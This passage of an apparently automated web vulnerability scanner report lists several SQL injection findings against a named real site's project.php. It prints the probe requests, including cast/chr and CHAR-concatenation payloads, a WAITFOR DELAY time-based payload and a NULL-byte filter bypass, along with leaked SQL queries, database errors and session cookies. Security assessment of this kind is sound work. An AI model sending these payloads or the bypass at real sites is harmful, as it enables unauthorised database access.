Path:   /ppc/leadflow/dima00/leadflow/dima00/project.php

Issue detail

The name of an arbitrarily supplied request parameter appears to be vulnerable to SQL injection attacks. A single quote was submitted in the name of an arbitrarily supplied request parameter, and a database error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The database appears to be MySQL.

Request 1

GET /ppc/leadflow/dima00/leadflow/dima00/project.php?ca&1'=1 HTTP/1.1
Referer: http://www.insideup.com/ppc/leadflow/dima00/project.php?catId=1;WAITFOR%20DELAY%20%270:0:25%27--&iusrc=iupsc
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; Hoyt LLC Research - Crawler Fingerprinting Operations)
Cache-Control: no-cache
Host: www.insideup.com
Cookie: PHPSESSID=gkpk9lpg74q0r9akbiavn3mf95; JSESSIONID=75C5DF8AFA17A50F9D10F1C6C2A4062B; OAID=dbc2322be090e669ff41d872456690ee; OAVARS[a08b960a]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%225%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[a750dce4]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A2%3A%2226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%223%22%3Bs%3A6%3A%22oadest%22%3Bs%3A48%3A%22http%3A%2F%2Fwww.insideup.com%2Fteledirectcasestudy.html%22%3B%7D
Accept-Encoding: gzip, deflate
Proxy-Connection: Keep-Alive

Response 1

HTTP/1.1 200 OK
Date: Mon, 14 Mar 2011 07:00:13 GMT
Server: Apache/2.2.9 (Fedora)
X-Powered-By: PHP/5.2.6
P3P: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT"
Content-Length: 2214
Connection: close
Content-Type: text/html; charset=UTF-8


select prj.catId,prj.groupId,grps.group_name,prj.templateId,prj.project_page_url from lead_flow_one_pages_details prj
   left join sub_category cats on cats.sub_category_id = prj.catId
   left join lea
...[SNIP]...
ps on grps.group_id = prj.groupId    
    where prj.project_page_url = 'leadflow/dima00/leadflow/dima00/project.php?ca&1'=1' OR prj.project_page_url = 'leadflow/dima00/leadflow/dima00/project.php?ca&1'=1/'You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '' OR prj.project_page_url = 'leadflow/dima00/leadflow/dima00/project.php?ca&1'=1' at line 5

Request 2

GET /ppc/leadflow/dima00/leadflow/dima00/project.php?ca&1''=1 HTTP/1.1
Referer: http://www.insideup.com/ppc/leadflow/dima00/project.php?catId=1;WAITFOR%20DELAY%20%270:0:25%27--&iusrc=iupsc
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; Hoyt LLC Research - Crawler Fingerprinting Operations)
Cache-Control: no-cache
Host: www.insideup.com
Cookie: PHPSESSID=gkpk9lpg74q0r9akbiavn3mf95; JSESSIONID=75C5DF8AFA17A50F9D10F1C6C2A4062B; OAID=dbc2322be090e669ff41d872456690ee; OAVARS[a08b960a]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%225%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[a750dce4]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A2%3A%2226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%223%22%3Bs%3A6%3A%22oadest%22%3Bs%3A48%3A%22http%3A%2F%2Fwww.insideup.com%2Fteledirectcasestudy.html%22%3B%7D
Accept-Encoding: gzip, deflate
Proxy-Connection: Keep-Alive

Response 2

HTTP/1.0 404 Not Found
Date: Mon, 14 Mar 2011 07:00:14 GMT
Server: Apache/2.2.9 (Fedora)
X-Powered-By: PHP/5.2.6
P3P: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT"
Content-Length: 122
Connection: close
Content-Type: text/html; charset=UTF-8


<h1>Not Found</h1><p>The requested URL /ppc/leadflow/dima00/leadflow/dima00/project.php was not found on this server.</p>

1.246. http://www.insideup.com/ppc/leadflow/dima00/project.php [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.insideup.com
Path:   /ppc/leadflow/dima00/project.php

Issue detail

The REST URL parameter 2 appears to be vulnerable to SQL injection attacks. A single quote was submitted in the REST URL parameter 2, and a database error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The database appears to be MySQL.

Request 1

GET /ppc/leadflow'/dima00/project.php?catId=cast((select+chr(95)%7c%7cchr(33)%7c%7cchr(64)%7c%7cchr(53)%7c%7cchr(100)%7c%7cchr(105)%7c%7cchr(108)%7c%7cchr(101)%7c%7cchr(109)%7c%7cchr(109)%7c%7cchr(97))+as+numeric)&iusrc=iupsc&address=Address&attributeId_342_g=2017__Accounting%2fFinance&attributeId_343_g=2009__1-9&attributeId_344_g=2041__Advertising%2fMarketing%2fPR&attributeId_423%5B%5D=2749__Coupon&attributeId_424=2760__Design%2c+print%2c+and+send&attributeId_425=2765__Yes+-+We+already+have+a+list+of+addresses&attributeId_426=2768__500+-+4%2c999&attributeId_427=2775__One-time+campaign&attributeId_428=2779__Immediately&button3=Submit&companyname=Company+Name&emailaddress=Email&firstname=First+Name&lastname=Last+Name&phone=Phone&subcategoryId=80006&website=n%2fa&zip=Zip+code HTTP/1.1
Referer: http://www.insideup.com/ppc/leadflow/dima00/project.php?catId=80006&iusrc=iupsc
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; Hoyt LLC Research - Crawler Fingerprinting Operations)
Cache-Control: no-cache
Host: www.insideup.com
Accept-Encoding: gzip, deflate
Proxy-Connection: Keep-Alive

Response 1

HTTP/1.1 200 OK
Date: Mon, 14 Mar 2011 01:53:24 GMT
Server: Apache/2.2.9 (Fedora)
X-Powered-By: PHP/5.2.6
P3P: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT"
Set-Cookie: PHPSESSID=p4oa4vosihflapcklmtlgtgq60; path=/
Content-Length: 7542
Connection: close
Content-Type: text/html; charset=UTF-8


select prj.catId,prj.groupId,grps.group_name,prj.templateId,prj.project_page_url from lead_flow_one_pages_details prj
   left join sub_category cats on cats.sub_category_id = prj.catId
   left join lea
...[SNIP]...
campaign&attributeId_428=2779__Immediately&button3=Submit&companyname=Company Name&emailaddress=Email&firstname=First Name&lastname=Last Name&phone=Phone&subcategoryId=80006&website=n/a&zip=Zip code/'You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '?catId=cast((select chr(95)||chr(33)||chr(64)||chr(53)||chr(100)||chr(105)||chr(' at line 5

Request 2

GET /ppc/leadflow''/dima00/project.php?catId=cast((select+chr(95)%7c%7cchr(33)%7c%7cchr(64)%7c%7cchr(53)%7c%7cchr(100)%7c%7cchr(105)%7c%7cchr(108)%7c%7cchr(101)%7c%7cchr(109)%7c%7cchr(109)%7c%7cchr(97))+as+numeric)&iusrc=iupsc&address=Address&attributeId_342_g=2017__Accounting%2fFinance&attributeId_343_g=2009__1-9&attributeId_344_g=2041__Advertising%2fMarketing%2fPR&attributeId_423%5B%5D=2749__Coupon&attributeId_424=2760__Design%2c+print%2c+and+send&attributeId_425=2765__Yes+-+We+already+have+a+list+of+addresses&attributeId_426=2768__500+-+4%2c999&attributeId_427=2775__One-time+campaign&attributeId_428=2779__Immediately&button3=Submit&companyname=Company+Name&emailaddress=Email&firstname=First+Name&lastname=Last+Name&phone=Phone&subcategoryId=80006&website=n%2fa&zip=Zip+code HTTP/1.1
Referer: http://www.insideup.com/ppc/leadflow/dima00/project.php?catId=80006&iusrc=iupsc
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; Hoyt LLC Research - Crawler Fingerprinting Operations)
Cache-Control: no-cache
Host: www.insideup.com
Accept-Encoding: gzip, deflate
Proxy-Connection: Keep-Alive

Response 2

HTTP/1.0 404 Not Found
Date: Mon, 14 Mar 2011 01:53:24 GMT
Server: Apache/2.2.9 (Fedora)
X-Powered-By: PHP/5.2.6
P3P: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT"
Set-Cookie: PHPSESSID=it4melste144b75r18ct8l3ec6; path=/
Content-Length: 108
Connection: close
Content-Type: text/html; charset=UTF-8


<h1>Not Found</h1><p>The requested URL /ppc/leadflow''/dima00/project.php was not found on this server.</p>

1.247. http://www.insideup.com/ppc/leadflow/dima00/project.php [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.insideup.com
Path:   /ppc/leadflow/dima00/project.php

Issue detail

The REST URL parameter 3 appears to be vulnerable to SQL injection attacks. A single quote was submitted in the REST URL parameter 3, and a database error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The database appears to be MySQL.

Request 1

GET /ppc/leadflow/dima00'/project.php?catId=cast((select+chr(95)%7c%7cchr(33)%7c%7cchr(64)%7c%7cchr(53)%7c%7cchr(100)%7c%7cchr(105)%7c%7cchr(108)%7c%7cchr(101)%7c%7cchr(109)%7c%7cchr(109)%7c%7cchr(97))+as+numeric)&iusrc=iupsc&address=Address&attributeId_342_g=2017__Accounting%2fFinance&attributeId_343_g=2009__1-9&attributeId_344_g=2041__Advertising%2fMarketing%2fPR&attributeId_423%5B%5D=2749__Coupon&attributeId_424=2760__Design%2c+print%2c+and+send&attributeId_425=2765__Yes+-+We+already+have+a+list+of+addresses&attributeId_426=2768__500+-+4%2c999&attributeId_427=2775__One-time+campaign&attributeId_428=2779__Immediately&button3=Submit&companyname=Company+Name&emailaddress=Email&firstname=First+Name&lastname=Last+Name&phone=Phone&subcategoryId=80006&website=n%2fa&zip=Zip+code HTTP/1.1
Referer: http://www.insideup.com/ppc/leadflow/dima00/project.php?catId=80006&iusrc=iupsc
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; Hoyt LLC Research - Crawler Fingerprinting Operations)
Cache-Control: no-cache
Host: www.insideup.com
Accept-Encoding: gzip, deflate
Proxy-Connection: Keep-Alive

Response 1

HTTP/1.1 200 OK
Date: Mon, 14 Mar 2011 01:53:37 GMT
Server: Apache/2.2.9 (Fedora)
X-Powered-By: PHP/5.2.6
P3P: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT"
Set-Cookie: PHPSESSID=4obdi8e5fkvk91fadlcsj3vej0; path=/
Content-Length: 7542
Connection: close
Content-Type: text/html; charset=UTF-8


select prj.catId,prj.groupId,grps.group_name,prj.templateId,prj.project_page_url from lead_flow_one_pages_details prj
   left join sub_category cats on cats.sub_category_id = prj.catId
   left join lea
...[SNIP]...
campaign&attributeId_428=2779__Immediately&button3=Submit&companyname=Company Name&emailaddress=Email&firstname=First Name&lastname=Last Name&phone=Phone&subcategoryId=80006&website=n/a&zip=Zip code/'You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '?catId=cast((select chr(95)||chr(33)||chr(64)||chr(53)||chr(100)||chr(105)||chr(' at line 5

Request 2

GET /ppc/leadflow/dima00''/project.php?catId=cast((select+chr(95)%7c%7cchr(33)%7c%7cchr(64)%7c%7cchr(53)%7c%7cchr(100)%7c%7cchr(105)%7c%7cchr(108)%7c%7cchr(101)%7c%7cchr(109)%7c%7cchr(109)%7c%7cchr(97))+as+numeric)&iusrc=iupsc&address=Address&attributeId_342_g=2017__Accounting%2fFinance&attributeId_343_g=2009__1-9&attributeId_344_g=2041__Advertising%2fMarketing%2fPR&attributeId_423%5B%5D=2749__Coupon&attributeId_424=2760__Design%2c+print%2c+and+send&attributeId_425=2765__Yes+-+We+already+have+a+list+of+addresses&attributeId_426=2768__500+-+4%2c999&attributeId_427=2775__One-time+campaign&attributeId_428=2779__Immediately&button3=Submit&companyname=Company+Name&emailaddress=Email&firstname=First+Name&lastname=Last+Name&phone=Phone&subcategoryId=80006&website=n%2fa&zip=Zip+code HTTP/1.1
Referer: http://www.insideup.com/ppc/leadflow/dima00/project.php?catId=80006&iusrc=iupsc
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; Hoyt LLC Research - Crawler Fingerprinting Operations)
Cache-Control: no-cache
Host: www.insideup.com
Accept-Encoding: gzip, deflate
Proxy-Connection: Keep-Alive

Response 2

HTTP/1.0 404 Not Found
Date: Mon, 14 Mar 2011 01:53:38 GMT
Server: Apache/2.2.9 (Fedora)
X-Powered-By: PHP/5.2.6
P3P: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT"
Set-Cookie: PHPSESSID=7s5g8j996fbqv5e3cr5jtmvda0; path=/
Content-Length: 108
Connection: close
Content-Type: text/html; charset=UTF-8


<h1>Not Found</h1><p>The requested URL /ppc/leadflow/dima00''/project.php was not found on this server.</p>

1.248. http://www.insideup.com/ppc/leadflow/dima00/project.php [REST URL parameter 4]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.insideup.com
Path:   /ppc/leadflow/dima00/project.php

Issue detail

The REST URL parameter 4 appears to be vulnerable to SQL injection attacks. A single quote was submitted in the REST URL parameter 4, and a database error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The database appears to be MySQL.

Request 1

GET /ppc/leadflow/dima00/project.php'?catId=cast((select+chr(95)%7c%7cchr(33)%7c%7cchr(64)%7c%7cchr(53)%7c%7cchr(100)%7c%7cchr(105)%7c%7cchr(108)%7c%7cchr(101)%7c%7cchr(109)%7c%7cchr(109)%7c%7cchr(97))+as+numeric)&iusrc=iupsc&address=Address&attributeId_342_g=2017__Accounting%2fFinance&attributeId_343_g=2009__1-9&attributeId_344_g=2041__Advertising%2fMarketing%2fPR&attributeId_423%5B%5D=2749__Coupon&attributeId_424=2760__Design%2c+print%2c+and+send&attributeId_425=2765__Yes+-+We+already+have+a+list+of+addresses&attributeId_426=2768__500+-+4%2c999&attributeId_427=2775__One-time+campaign&attributeId_428=2779__Immediately&button3=Submit&companyname=Company+Name&emailaddress=Email&firstname=First+Name&lastname=Last+Name&phone=Phone&subcategoryId=80006&website=n%2fa&zip=Zip+code HTTP/1.1
Referer: http://www.insideup.com/ppc/leadflow/dima00/project.php?catId=80006&iusrc=iupsc
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; Hoyt LLC Research - Crawler Fingerprinting Operations)
Cache-Control: no-cache
Host: www.insideup.com
Accept-Encoding: gzip, deflate
Proxy-Connection: Keep-Alive

Response 1

HTTP/1.1 200 OK
Date: Mon, 14 Mar 2011 01:53:49 GMT
Server: Apache/2.2.9 (Fedora)
X-Powered-By: PHP/5.2.6
P3P: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT"
Set-Cookie: PHPSESSID=kcpgku846tn2o61og36v0povb1; path=/
Content-Length: 7542
Connection: close
Content-Type: text/html; charset=UTF-8


select prj.catId,prj.groupId,grps.group_name,prj.templateId,prj.project_page_url from lead_flow_one_pages_details prj
   left join sub_category cats on cats.sub_category_id = prj.catId
   left join lea
...[SNIP]...
campaign&attributeId_428=2779__Immediately&button3=Submit&companyname=Company Name&emailaddress=Email&firstname=First Name&lastname=Last Name&phone=Phone&subcategoryId=80006&website=n/a&zip=Zip code/'You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '?catId=cast((select chr(95)||chr(33)||chr(64)||chr(53)||chr(100)||chr(105)||chr(' at line 5

Request 2

GET /ppc/leadflow/dima00/project.php''?catId=cast((select+chr(95)%7c%7cchr(33)%7c%7cchr(64)%7c%7cchr(53)%7c%7cchr(100)%7c%7cchr(105)%7c%7cchr(108)%7c%7cchr(101)%7c%7cchr(109)%7c%7cchr(109)%7c%7cchr(97))+as+numeric)&iusrc=iupsc&address=Address&attributeId_342_g=2017__Accounting%2fFinance&attributeId_343_g=2009__1-9&attributeId_344_g=2041__Advertising%2fMarketing%2fPR&attributeId_423%5B%5D=2749__Coupon&attributeId_424=2760__Design%2c+print%2c+and+send&attributeId_425=2765__Yes+-+We+already+have+a+list+of+addresses&attributeId_426=2768__500+-+4%2c999&attributeId_427=2775__One-time+campaign&attributeId_428=2779__Immediately&button3=Submit&companyname=Company+Name&emailaddress=Email&firstname=First+Name&lastname=Last+Name&phone=Phone&subcategoryId=80006&website=n%2fa&zip=Zip+code HTTP/1.1
Referer: http://www.insideup.com/ppc/leadflow/dima00/project.php?catId=80006&iusrc=iupsc
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; Hoyt LLC Research - Crawler Fingerprinting Operations)
Cache-Control: no-cache
Host: www.insideup.com
Accept-Encoding: gzip, deflate
Proxy-Connection: Keep-Alive

Response 2

HTTP/1.0 404 Not Found
Date: Mon, 14 Mar 2011 01:53:49 GMT
Server: Apache/2.2.9 (Fedora)
X-Powered-By: PHP/5.2.6
P3P: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT"
Set-Cookie: PHPSESSID=ipn6ineakh35eb5dm0o8hrtm54; path=/
Content-Length: 108
Connection: close
Content-Type: text/html; charset=UTF-8


<h1>Not Found</h1><p>The requested URL /ppc/leadflow/dima00/project.php'' was not found on this server.</p>

1.249. http://www.insideup.com/ppc/leadflow/dima00/project.php [address parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.insideup.com
Path:   /ppc/leadflow/dima00/project.php

Issue detail

The address parameter appears to be vulnerable to SQL injection attacks. A single quote was submitted in the address parameter, and a database error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The database appears to be MySQL.

Request 1

GET /ppc/leadflow/dima00/project.php?catId=cast((select+chr(95)%7c%7cchr(33)%7c%7cchr(64)%7c%7cchr(53)%7c%7cchr(100)%7c%7cchr(105)%7c%7cchr(108)%7c%7cchr(101)%7c%7cchr(109)%7c%7cchr(109)%7c%7cchr(97))+as+numeric)&iusrc=iupsc&address=Address'&attributeId_342_g=2017__Accounting%2fFinance&attributeId_343_g=2009__1-9&attributeId_344_g=2041__Advertising%2fMarketing%2fPR&attributeId_423%5B%5D=2749__Coupon&attributeId_424=2760__Design%2c+print%2c+and+send&attributeId_425=2765__Yes+-+We+already+have+a+list+of+addresses&attributeId_426=2768__500+-+4%2c999&attributeId_427=2775__One-time+campaign&attributeId_428=2779__Immediately&button3=Submit&companyname=Company+Name&emailaddress=Email&firstname=First+Name&lastname=Last+Name&phone=Phone&subcategoryId=80006&website=n%2fa&zip=Zip+code HTTP/1.1
Referer: http://www.insideup.com/ppc/leadflow/dima00/project.php?catId=80006&iusrc=iupsc
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; Hoyt LLC Research - Crawler Fingerprinting Operations)
Cache-Control: no-cache
Host: www.insideup.com
Accept-Encoding: gzip, deflate
Proxy-Connection: Keep-Alive

Response 1

HTTP/1.1 200 OK
Date: Mon, 14 Mar 2011 01:52:00 GMT
Server: Apache/2.2.9 (Fedora)
X-Powered-By: PHP/5.2.6
P3P: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT"
Set-Cookie: PHPSESSID=48kq3cmmdftafkg4tlde56uua7; path=/
Content-Length: 7542
Connection: close
Content-Type: text/html; charset=UTF-8


select prj.catId,prj.groupId,grps.group_name,prj.templateId,prj.project_page_url from lead_flow_one_pages_details prj
   left join sub_category cats on cats.sub_category_id = prj.catId
   left join lea
...[SNIP]...
campaign&attributeId_428=2779__Immediately&button3=Submit&companyname=Company Name&emailaddress=Email&firstname=First Name&lastname=Last Name&phone=Phone&subcategoryId=80006&website=n/a&zip=Zip code/'You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '[]=2749__Coupon&attributeId_424=2760__Design, print, and send&attributeId_425=27' at line 5

Request 2

GET /ppc/leadflow/dima00/project.php?catId=cast((select+chr(95)%7c%7cchr(33)%7c%7cchr(64)%7c%7cchr(53)%7c%7cchr(100)%7c%7cchr(105)%7c%7cchr(108)%7c%7cchr(101)%7c%7cchr(109)%7c%7cchr(109)%7c%7cchr(97))+as+numeric)&iusrc=iupsc&address=Address''&attributeId_342_g=2017__Accounting%2fFinance&attributeId_343_g=2009__1-9&attributeId_344_g=2041__Advertising%2fMarketing%2fPR&attributeId_423%5B%5D=2749__Coupon&attributeId_424=2760__Design%2c+print%2c+and+send&attributeId_425=2765__Yes+-+We+already+have+a+list+of+addresses&attributeId_426=2768__500+-+4%2c999&attributeId_427=2775__One-time+campaign&attributeId_428=2779__Immediately&button3=Submit&companyname=Company+Name&emailaddress=Email&firstname=First+Name&lastname=Last+Name&phone=Phone&subcategoryId=80006&website=n%2fa&zip=Zip+code HTTP/1.1
Referer: http://www.insideup.com/ppc/leadflow/dima00/project.php?catId=80006&iusrc=iupsc
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; Hoyt LLC Research - Crawler Fingerprinting Operations)
Cache-Control: no-cache
Host: www.insideup.com
Accept-Encoding: gzip, deflate
Proxy-Connection: Keep-Alive

Response 2

HTTP/1.1 200 OK
Date: Mon, 14 Mar 2011 01:52:00 GMT
Server: Apache/2.2.9 (Fedora)
X-Powered-By: PHP/5.2.6
P3P: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT"
Set-Cookie: PHPSESSID=aqhcsavcs1m3nfqfa87k0nki82; path=/
Content-Length: 20
Connection: close
Content-Type: text/html; charset=UTF-8

Too many connections

1.250. http://www.insideup.com/ppc/leadflow/dima00/project.php [attributeId_342_g parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.insideup.com
Path:   /ppc/leadflow/dima00/project.php

Issue detail

The attributeId_342_g parameter appears to be vulnerable to SQL injection attacks. A single quote was submitted in the attributeId_342_g parameter, and a database error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The database appears to be MySQL.

Request 1

GET /ppc/leadflow/dima00/project.php?catId=cast((select+chr(95)%7c%7cchr(33)%7c%7cchr(64)%7c%7cchr(53)%7c%7cchr(100)%7c%7cchr(105)%7c%7cchr(108)%7c%7cchr(101)%7c%7cchr(109)%7c%7cchr(109)%7c%7cchr(97))+as+numeric)&iusrc=iupsc&address=Address&attributeId_342_g=2017__Accounting%2fFinance'&attributeId_343_g=2009__1-9&attributeId_344_g=2041__Advertising%2fMarketing%2fPR&attributeId_423%5B%5D=2749__Coupon&attributeId_424=2760__Design%2c+print%2c+and+send&attributeId_425=2765__Yes+-+We+already+have+a+list+of+addresses&attributeId_426=2768__500+-+4%2c999&attributeId_427=2775__One-time+campaign&attributeId_428=2779__Immediately&button3=Submit&companyname=Company+Name&emailaddress=Email&firstname=First+Name&lastname=Last+Name&phone=Phone&subcategoryId=80006&website=n%2fa&zip=Zip+code HTTP/1.1
Referer: http://www.insideup.com/ppc/leadflow/dima00/project.php?catId=80006&iusrc=iupsc
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; Hoyt LLC Research - Crawler Fingerprinting Operations)
Cache-Control: no-cache
Host: www.insideup.com
Accept-Encoding: gzip, deflate
Proxy-Connection: Keep-Alive

Response 1

HTTP/1.1 200 OK
Date: Mon, 14 Mar 2011 01:52:02 GMT
Server: Apache/2.2.9 (Fedora)
X-Powered-By: PHP/5.2.6
P3P: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT"
Set-Cookie: PHPSESSID=v24m8mj0nhesi7hj4l472ji0f6; path=/
Content-Length: 7542
Connection: close
Content-Type: text/html; charset=UTF-8


select prj.catId,prj.groupId,grps.group_name,prj.templateId,prj.project_page_url from lead_flow_one_pages_details prj
   left join sub_category cats on cats.sub_category_id = prj.catId
   left join lea
...[SNIP]...
campaign&attributeId_428=2779__Immediately&button3=Submit&companyname=Company Name&emailaddress=Email&firstname=First Name&lastname=Last Name&phone=Phone&subcategoryId=80006&website=n/a&zip=Zip code/'You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '[]=2749__Coupon&attributeId_424=2760__Design, print, and send&attributeId_425=27' at line 5

Request 2

GET /ppc/leadflow/dima00/project.php?catId=cast((select+chr(95)%7c%7cchr(33)%7c%7cchr(64)%7c%7cchr(53)%7c%7cchr(100)%7c%7cchr(105)%7c%7cchr(108)%7c%7cchr(101)%7c%7cchr(109)%7c%7cchr(109)%7c%7cchr(97))+as+numeric)&iusrc=iupsc&address=Address&attributeId_342_g=2017__Accounting%2fFinance''&attributeId_343_g=2009__1-9&attributeId_344_g=2041__Advertising%2fMarketing%2fPR&attributeId_423%5B%5D=2749__Coupon&attributeId_424=2760__Design%2c+print%2c+and+send&attributeId_425=2765__Yes+-+We+already+have+a+list+of+addresses&attributeId_426=2768__500+-+4%2c999&attributeId_427=2775__One-time+campaign&attributeId_428=2779__Immediately&button3=Submit&companyname=Company+Name&emailaddress=Email&firstname=First+Name&lastname=Last+Name&phone=Phone&subcategoryId=80006&website=n%2fa&zip=Zip+code HTTP/1.1
Referer: http://www.insideup.com/ppc/leadflow/dima00/project.php?catId=80006&iusrc=iupsc
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; Hoyt LLC Research - Crawler Fingerprinting Operations)
Cache-Control: no-cache
Host: www.insideup.com
Accept-Encoding: gzip, deflate
Proxy-Connection: Keep-Alive

Response 2

HTTP/1.0 404 Not Found
Date: Mon, 14 Mar 2011 01:52:03 GMT
Server: Apache/2.2.9 (Fedora)
X-Powered-By: PHP/5.2.6
P3P: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT"
Set-Cookie: PHPSESSID=17j74sq0n1vo09c6q517ps1853; path=/
Content-Length: 106
Connection: close
Content-Type: text/html; charset=UTF-8


<h1>Not Found</h1><p>The requested URL /ppc/leadflow/dima00/project.php was not found on this server.</p>

1.251. http://www.insideup.com/ppc/leadflow/dima00/project.php [attributeId_342_g parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.insideup.com
Path:   /ppc/leadflow/dima00/project.php

Issue detail

The attributeId_342_g parameter appears to be vulnerable to SQL injection attacks. A single quote was submitted in the attributeId_342_g parameter, and a database error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The database appears to be MySQL.

The application attempts to block SQL injection attacks but this can be circumvented by submitting a URL-encoded NULL byte (%00) before the characters that are being blocked.

Request 1

GET /ppc/leadflow/dima00/project.php?catId=80006&iusrc=iupsc&address=Address&attributeId_342_g=2017__Accounting%2fFinance%00'&attributeId_343_g=2009__1-9&attributeId_344_g=2041__Advertising%2fMarketing%2fPR&attributeId_423%5B%5D=2749__Coupon&attributeId_424=2760__Design%2c+print%2c+and+send&attributeId_425=2765__Yes+-+We+already+have+a+list+of+addresses&attributeId_426=2768__500+-+4%2c999&attributeId_427=2775__One-time+campaign&attributeId_428=convert(int,(CHAR(95)%2BCHAR(33)%2BCHAR(64)%2BCHAR(50)%2BCHAR(100)%2BCHAR(105)%2BCHAR(108)%2BCHAR(101)%2BCHAR(109)%2BCHAR(109)%2BCHAR(97)))&button3=Submit&companyname=Company+Name&emailaddress=Email&firstname=First+Name&lastname=Last+Name&phone=Phone&subcategoryId=80006&website=n%2fa&zip=Zip+code HTTP/1.1
Referer: http://www.insideup.com/ppc/leadflow/dima00/project.php?catId=80006&iusrc=iupsc
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; Hoyt LLC Research - Crawler Fingerprinting Operations)
Cache-Control: no-cache
Host: www.insideup.com
Cookie: PHPSESSID=q6d19asjosjf8q6o73h881vfb0; JSESSIONID=CBDF7C1273F4A010EBD52B4D46676C09; OAID=dbc2322be090e669ff41d872456690ee
Accept-Encoding: gzip, deflate
Proxy-Connection: Keep-Alive

Response 1

HTTP/1.1 200 OK
Date: Mon, 14 Mar 2011 02:08:40 GMT
Server: Apache/2.2.9 (Fedora)
X-Powered-By: PHP/5.2.6
P3P: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT"
Content-Length: 7374
Connection: close
Content-Type: text/html; charset=UTF-8


select prj.catId,prj.groupId,grps.group_name,prj.templateId,prj.project_page_url from lead_flow_one_pages_details prj
   left join sub_category cats on cats.sub_category_id = prj.catId
   left join lea
...[SNIP]...
